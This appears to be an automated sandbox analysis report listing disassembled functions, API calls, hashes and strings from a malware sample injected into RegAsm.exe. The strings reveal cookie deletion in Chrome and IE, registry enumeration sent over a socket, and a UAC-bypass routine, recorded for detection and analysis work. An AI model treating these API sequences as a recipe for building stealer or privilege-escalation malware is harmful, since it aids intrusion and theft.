                                                          • API String ID: 3431551938-0
                                                          • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                          • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                          Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16_free
                                                          • String ID: a/p$am/pm$zD
                                                          • API String ID: 2936374016-2723203690
                                                          • Opcode ID: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                          • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                          • Opcode Fuzzy Hash: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                          • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                          Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$xUG$TG
                                                          • API String ID: 3554306468-1165877943
                                                          • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                          • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                          Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                          • __fassign.LIBCMT ref: 0044B479
                                                          • __fassign.LIBCMT ref: 0044B494
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                                          • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                          • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                          Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: D[E$D[E
                                                          • API String ID: 269201875-3695742444
                                                          • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                          • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                          Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                          • __fassign.LIBCMT ref: 1000954F
                                                          • __fassign.LIBCMT ref: 1000956A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                          Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                            • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                            • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: xUG$NG$NG$TG
                                                          • API String ID: 3114080316-2811732169
                                                          • Opcode ID: 6c4551c0fef6ea8a62e0362b81dd69ab0e8a90bfa27d8b291aed53c83e443e60
                                                          • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                          • Opcode Fuzzy Hash: 6c4551c0fef6ea8a62e0362b81dd69ab0e8a90bfa27d8b291aed53c83e443e60
                                                          • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                          Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                          Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                            • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                            • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • _wcslen.LIBCMT ref: 0041B763
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 3286818993-122982132
                                                          • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                          • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                          Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                            • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                            • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                          • API String ID: 1133728706-4073444585
                                                          • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                          • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                          Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                          • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                          • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                          • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                          Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                          • _free.LIBCMT ref: 00450F48
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00450F53
                                                          • _free.LIBCMT ref: 00450F5E
                                                          • _free.LIBCMT ref: 00450FB2
                                                          • _free.LIBCMT ref: 00450FBD
                                                          • _free.LIBCMT ref: 00450FC8
                                                          • _free.LIBCMT ref: 00450FD3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                          Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                          • _free.LIBCMT ref: 100092AB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100092B6
                                                          • _free.LIBCMT ref: 100092C1
                                                          • _free.LIBCMT ref: 10009315
                                                          • _free.LIBCMT ref: 10009320
                                                          • _free.LIBCMT ref: 1000932B
                                                          • _free.LIBCMT ref: 10009336
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                          Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                          • int.LIBCPMT ref: 00411183
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: (mG
                                                          • API String ID: 2536120697-4059303827
                                                          • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                          • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                          Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                          • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                          • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                          Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004075D0
                                                            • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                            • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          • CoUninitialize.OLE32 ref: 00407629
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-1839356972
                                                          • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                          • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                          Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                          • GetLastError.KERNEL32 ref: 0040BAE7
                                                          Strings
                                                          • UserProfile, xrefs: 0040BAAD
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                          • [Chrome Cookies not found], xrefs: 0040BB01
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                          • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                          Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 0043AC69
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                          • __allrem.LIBCMT ref: 0043AC9C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                          • __allrem.LIBCMT ref: 0043ACD1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
